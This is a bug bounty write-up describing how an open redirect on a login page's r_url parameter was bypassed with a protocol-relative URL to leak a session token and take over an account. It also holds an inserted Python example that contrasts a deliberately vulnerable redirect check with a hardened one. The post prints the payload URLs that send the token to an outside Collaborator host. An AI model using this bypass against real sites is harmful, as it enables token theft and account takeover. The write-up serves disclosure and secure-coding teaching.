Hi everyone,
How are you all doing? In this article, I'm going to talk about an open redirect bug I discovered in a self-hosted bug bounty program (which I'll refer to as "redacted") that got me a $200 bounty.
By combining some dorks, I found a lot of fresh targets that no one had touched yet.
I chose this random target and crawled the site for 5 minutes.
I observed that there was only a single login page and tried every test case on it, but had no luck. I crawled and fuzzed the whole website looking for a register button but found nothing.
At last, I used dorks to find the register page.
site:redacted.com "register" OR "signup" OR "registration"
After trying the above dork in Bing, I found a register page.
I successfully registered an account, and when I tried to log in, I thought, why don’t I check for hidden parameters on the login page?
After running Arjun, X8, and GAP on the login page, I found a hit: the r_url parameter existed.
I added ?r_url to the login page and included my Collaborator link to escalate the impact, but it was not accepting any other domains.
https://redacted.com/user/login?r_url=https://collaboratorserver - ERROR
I used a simple bypass trick to get around this: a protocol-relative URL (no scheme, just //host), which the check did not treat as an external domain.
https://redacted.com/user/login?r_url=//collaboratorserver - OK
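To show why the absolute-URL check above fails and what a correct one looks like, here is an added example that is not part of the original post or of the redacted program's code. The hostname redacted.com, the r_url parameter name and the /dashboard default are taken from the post; the function names, the cookie name and the Collaborator hostname are my own assumptions. The first function mirrors the behaviour described in the post (reject https://other, accept //other); the second only ever redirects to a path on the site's own origin and, in the login response, sends the session token as a cookie rather than in the redirect URL, so nothing is leaked even if a redirect ever escapes.

```python
from urllib.parse import urlparse, urljoin

# Assumed origin of the application (the post only gives the redacted hostname).
SITE_ORIGIN = "https://redacted.com"
DEFAULT_AFTER_LOGIN = "/dashboard"


def naive_allows(r_url: str) -> bool:
    """Vulnerable check, reconstructed from the post's observed behaviour.

    It only refuses a redirect that carries an explicit scheme AND a foreign
    host, so a protocol-relative URL such as //collaboratorserver (scheme is
    empty) slips through and the browser resolves it to https://collaboratorserver.
    """
    parsed = urlparse(r_url)
    if parsed.scheme and parsed.netloc and parsed.netloc != urlparse(SITE_ORIGIN).netloc:
        return False
    return True


def safe_redirect_target(r_url: str, default: str = DEFAULT_AFTER_LOGIN) -> str:
    """Hardened check: accept only an absolute *path* on our own origin.

    Anything else (absolute URL, protocol-relative URL, backslash tricks,
    control characters that browsers silently strip) falls back to `default`.
    """
    if not r_url:
        return default
    # Browsers strip tabs/newlines and leading spaces before parsing, so
    # "/\t/evil" becomes "//evil". Refuse any control or space character.
    if any(ord(c) <= 0x20 or ord(c) == 0x7F for c in r_url):
        return default
    # Browsers treat "\" like "/" in special-scheme URLs: "/\evil" is "//evil".
    if "\\" in r_url:
        return default
    # Must be a path: exactly one leading slash. "//host" and "///host" are
    # authority-bearing in browsers even when urlparse reports no netloc.
    if not r_url.startswith("/") or r_url.startswith("//"):
        return default
    parsed = urlparse(r_url)
    if parsed.scheme or parsed.netloc:
        return default
    # Final belt-and-braces: resolve against our origin and confirm the host.
    resolved = urlparse(urljoin(SITE_ORIGIN + "/", r_url))
    if resolved.netloc != urlparse(SITE_ORIGIN).netloc:
        return default
    return r_url


def login_response_headers(r_url: str, session_token: str) -> dict:
    """Headers for the post-login redirect.

    The token travels in an HttpOnly cookie, never in the Location URL, so a
    redirect to a third party could not carry it even if the validator failed.
    Cookie name and attributes are assumptions for this example.
    """
    return {
        "Location": safe_redirect_target(r_url),
        "Set-Cookie": f"session={session_token}; Path=/; HttpOnly; Secure; SameSite=Lax",
    }


if __name__ == "__main__":
    for candidate in ("https://collaboratorserver", "//collaboratorserver",
                      "/\\collaboratorserver", "///collaboratorserver", "/account"):
        print(f"{candidate!r:32} naive={naive_allows(candidate)!s:5} "
              f"safe->{safe_redirect_target(candidate)}")
```

The important design point is that the hardened version is an allow-list (exactly one leading slash, no scheme, no authority, no control or backslash characters, and a resolved host equal to ours), whereas the naive one is a deny-list on one particular shape of external URL; every bypass in the post and in the example comes from a URL shape the deny-list never anticipated.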
After logging in, the Collaborator server received an HTTP hit with the token, and I was like, WOW!! Account Takeover!!
GET /?token=xxxxxxxxx HTTP/1.1
I added this token to the Cookie Editor extension and appended /dashboard to the root URL. I accessed the dashboard with the token I had received on my server.
I created a proper POC and sent it to the team. Within 10 minutes, I received a response stating that it was a valid bug and eligible for a bounty, and they asked for my PayPal email to process the payment.
After 20 minutes, I received a $200 bounty in my PayPal account for the bug. I was actually expecting something higher, more than $500, but when I asked about it, they replied that they were a startup and this was the highest bounty payout from their side.
Thank you for reading!
Stay tuned for more insights and updates. Don’t forget to follow my blog for the latest posts.
You can also connect with me on LinkedIn: Surya Arigela